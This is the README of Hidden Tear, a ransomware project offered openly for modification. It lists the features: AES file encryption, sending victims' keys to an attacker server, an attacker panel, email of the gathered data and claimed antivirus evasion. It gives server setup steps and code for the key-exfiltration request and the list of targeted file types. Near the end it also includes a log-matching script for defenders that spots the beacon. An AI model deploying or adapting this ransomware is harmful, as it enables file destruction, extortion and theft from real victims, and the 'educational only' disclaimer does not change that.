https://github.com/Virgula0/hidden-tear

An open source RansomWare

**Hidden Tear**

It's a ransomware-like file crypter sample which can be modified for specific purposes.

**Features**
* Uses AES algorithm to encrypt files.
* Sends encryption key to a server.
* Encrypted files can be decrypted in the decrypter program with the encryption key.
* Creates a text file in Desktop with given message.
* Small file size (12 KB)
* Isn't detected by antivirus programs (15/08/2015) http://nodistribute.com/result/6a4jDwi83Fzt - Do not scan with VirusTotal or similar sites.
* This project was updated by Virgula0 and coded by Utku Sen.

**New features:**
* A new advanced server script was added that saves data into database.
* All information is sent if there is an internet connection; if there isn't, the ransomware waits for one.
* You can see all target information with Server Attacker panel.
* Script can also send you an email with gathered data.
* It can also encrypt .exe files and no longer gets collisions with other processes.
* It now encrypts a wider variety of file types and has a changing desktop icon with information about the attack.
* Hidden Tear Decryptor now advises if files have been decrypted or not.
* Hidden Tear Decryptor is now able to decrypt the same directories as the hidden-tear ransomware.
* Hidden Tear changes the default Windows desktop icon if decryption finishes successfully.
* A bug that could delete a part of the passcode while sending has been removed.

**Demonstration Video**

https://www.youtube.com/watch?v=0IvD9Sky9as

Warning: to keep the video short, it does not show the attacker panel, only the key saved into the file.

**Usage**

* You need to have a web server which supports PHP. Change this line with your URL, using an HTTPS connection to avoid eavesdropping.

`string targetURL = "https://www.example.com/Server/write.php";`

* Default Username and password for webpanel (in check.php file) are -> Username: test | Password: test
* Import SQL table in your database importing the file: import.sql
* Set your database credentials in the file: connect_db.php
* If you also want to write a file for every virus execution, go to the file `write.php` and uncomment lines 37 to 43. For privacy of information this is not recommended.
* To also receive the information by email, set your address (don't write your PERSONAL email) in line 47 of the file write.php

* The script should write the GET parameters into a database and optionally into a text file. The sending process runs in the `SendPassword()` function:

```
string info = "?computer_name=" + computerName + "&userName=" + userName + "&password=" + password + "&allow=ransom";
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);

```
* Target file extensions can be changed. Default list:
```
var validExtensions = new[]{".txt", ".jar", ".exe", ".dat", ".contact" , ".settings", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".py", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".htm", ".xml", ".psd" , ".pdf" , ".dll" , ".c" , ".cs", ".mp3" , ".mp4", ".f3d" , ".dwg" , ".cpp" , ".zip" , ".rar" , ".mov" , ".rtf" , ".bmp" , ".mkv" , ".avi" , ".apk" , ".lnk" , ".iso", ".7-zip", ".ace", ".arj", ".bz2", ".cab", ".gzip", ".lzh", ".tar", ".uue", ".xz", ".z", ".001", ".mpeg", ".mp3", ".mpg", ".core", ".crproj" , ".pdb", ".ico" , ".pas" , ".db" , ".torrent" };
```

* PLEASE DON'T ADD THE .INI EXTENSION BECAUSE THE CONFLICT WITH THESE FILES WILL CRASH YOUR SCRIPT.
* In this re-upload there is a function that waits for internet connection before sending password to the database:

```
//check for internet connection
public static bool CheckForInternetConnection()
{
    try
    {
        using (var client = new WebClient())
        {
            using (var stream = client.OpenRead("https://www.google.com"))
            {
                return true;
            }
        }
    }
    catch
    {
        return false;
    }
}
```
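
For defenders, the request built in `SendPassword()` above has a fixed query-string shape that can be matched in web-proxy logs. The following is an added example, not part of the project's code; the five-field log format, the sample lines and the output field names are constructed assumptions, and it only applies where the full URL is logged (plain HTTP or a TLS-inspecting proxy).

```python
from urllib.parse import urlsplit, parse_qs

# Parameter names copied from the SendPassword() query string on this page.
BEACON_PARAMS = {"computer_name", "userName", "password", "allow"}

# Constructed sample lines; assumed format: "time client method url status".
SAMPLE_LOG = """\
2024-01-10T09:14:02Z 10.0.0.23 GET http://www.example.com/Server/write.php?computer_name=WS-0142&userName=alice&password=SAMPLE-KEY-1&allow=ransom 200
2024-01-10T09:14:05Z 10.0.0.23 GET http://www.example.com/index.php?userName=alice&page=2 200
2024-01-10T09:15:40Z 10.0.0.57 GET http://intranet.example/login?userName=bob&password=x 302
2024-01-10T09:16:11Z 10.0.0.31 GET http://www.example.com/Server/write.php?allow=ransom&password=SAMPLE-KEY-2&userName=carol&computer_name=WS-0007 200
truncated line
"""


def find_beacons(log_text):
    """Return one record per request whose query string matches the beacon shape."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:  # skip malformed or truncated lines
            continue
        ts, client, _method, url, _status = fields
        parts = urlsplit(url)
        query = parse_qs(parts.query, keep_blank_values=True)
        # All four parameters must be present, in any order, with allow=ransom.
        if not BEACON_PARAMS.issubset(query) or query["allow"] != ["ransom"]:
            continue
        hits.append({
            "time": ts,
            "client": client,
            "server": parts.netloc + parts.path,
            "computer_name": query["computer_name"][0],
            "user": query["userName"][0],
            # The key travels in the URL, so the log line itself may allow recovery.
            "key": query["password"][0],
        })
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```

Because the key is a GET parameter, any hit also identifies the affected host and user and preserves the value needed by the decrypter.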

**Legal Warning**

While this may be helpful for some, there are significant risks. Hidden Tear may be used for educational purposes only. Do not use it as a ransomware! You could go to jail on obstruction of justice charges just for running Hidden Tear, even though you are innocent.